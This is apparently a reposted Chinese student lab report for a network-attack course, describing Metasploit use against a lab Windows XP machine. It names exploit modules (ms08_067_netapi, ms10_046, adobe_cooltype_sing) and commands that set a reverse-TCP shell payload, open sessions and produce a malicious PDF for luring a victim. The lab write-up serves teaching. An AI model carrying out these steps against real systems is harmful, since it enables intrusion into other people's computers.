2018-2019-2 20165331《網絡對抗技術》Exp5 MSF基礎應用
阿新 • • 發佈:2019-04-21
exploit eric 進入 監聽 學會 smb msf 實驗環境 訪問 用自己的話解釋什麽是exploit,payload,encode
(1)首先我使用ms08_067模塊進行主動攻擊。使用虛擬機kali進入metasploit的控制臺,然後我們使用
(2)從上圖可以看出只有一種模塊可以使用,於是通過命令
(3)再找到合適的載荷後,首先使用命令
(1)首先我使用ms10_046進行瀏覽器攻擊。老樣子,使用
(3)使用命令
(1)首先我使用Adobe進行瀏覽器攻擊。通過輸入命令
2018-2019-2 20165331《網絡對抗技術》Exp5 MSF基礎應用
實驗涉及漏洞
- 主動攻擊實踐:ms08_067(成功);
- 針對瀏覽器的攻擊:ms10_046(成功);
針對客戶端的攻擊:Adobe(成功)。
實驗收獲與感想
通過本次實驗,我學會了metasploit的基本應用方式,以及重點常用的三種攻擊方式的思路。同時對這幾種攻擊方式分別進行了實踐加深理解。但是同時我也感到很多不足,比如在尋找合適的漏洞時,因為不知道那些適用我的實驗環境而浪費了許多時間。還有本次實驗中所借助的漏洞都是第三方已經整理好的,而在實戰中沒有這種機會,對於這方面我覺得我還需要加強練習。
用自己的話解釋什麽是exploit,payload,encode
exploit:漏洞攻擊。一個exploit程序肯定會觸發系統的一個或多個漏洞,進而程序直接獲取到目標系統的部分或所有權限。一個漏洞攻擊程序可以在本地運行也可以遠程運行,遠程運行的漏洞攻擊可以理論上獲取被攻擊系統的所有控制權。
payload:有效載荷,可以理解為搞破壞的關鍵代碼。電腦病毒中可以直接完成預定目標的代碼段便是其“有效載荷”。
encode:編碼。通過一些特殊手段的編碼,可以既保證有效載荷不被破壞,又使得漏洞攻擊程序不會被偵察到。
離實戰還缺些什麽技術或步驟?
我覺得還需要一些可在無全部消息情況下主動發現靶機漏洞,並通過此漏洞獲取更多信息甚至全部信息,最終實現獲取靶機部分或所有權限的結果的手段。
實驗流程
Ⅰ一個主動攻擊實踐
(1)首先我使用ms08_067模塊進行主動攻擊。使用虛擬機kali進入metasploit的控制臺,然後我們使用search
指令來查找模塊
(2)從上圖可以看出只有一種模塊可以使用,於是通過命令use exploit/windows/smb/ms08_067_netapi
來使用該攻擊模塊,並可以通過命令show payloads
查看可用載荷
(3)再找到合適的載荷後,首先使用命令set payload generic/shell_reverse_tcp
設置載荷種類,然後使用show targets
來查看攻擊的目標,我們通過查看自己靶機的類型選擇對應的選項,最後設置回連主機IP地址和端口號(我這裏沒有設置端口號,系統會使用默認端口號4444)以及攻擊的靶機IP地址。
另:在之後的監聽過程中還發生了一個小插曲,因為這個WindowsXP系統是新安裝的,安裝完畢就直接拿去做實驗,導致在攻擊時出現無法回連的錯誤,經查明是未關閉防火墻的原因,關閉防火墻後攻擊成功(話說XP的防火墻都這麽虎的嗎……)
Ⅱ一個針對瀏覽器的攻擊
(1)首先我使用ms10_046進行瀏覽器攻擊。老樣子,使用search
指令查找模塊並選擇可用模塊
(2)對於模塊的設定方式早都用爛了,這裏直接上設置結果,過程不再贅述
(3)使用命令exploit
生成攻擊的URL,再使用靶機訪問這個URL,可以看到kali上生成了相互傳輸的數據包,再使用命令session -i 1
獲取shell,本次攻擊成功
Ⅲ 一個針對客戶端的攻擊
(1)首先我使用Adobe進行瀏覽器攻擊。通過輸入命令exploit/windows/fileformat/adobe_cooltype_sing
確定攻擊方案,並進行設定
(2)把生成的文件發送到受害者,並誘使其打開這個來路不明的pdf文件。同時,在Kali的msfconsole上開始監聽
Ⅳ成功應用任何一個輔助模塊
(1)最後我們嘗試使用一種輔助模塊,經過選擇我挑選了掃描的輔助模塊,並進行了掃描
2018-2019-2 20165331《網絡對抗技術》Exp5 MSF基礎應用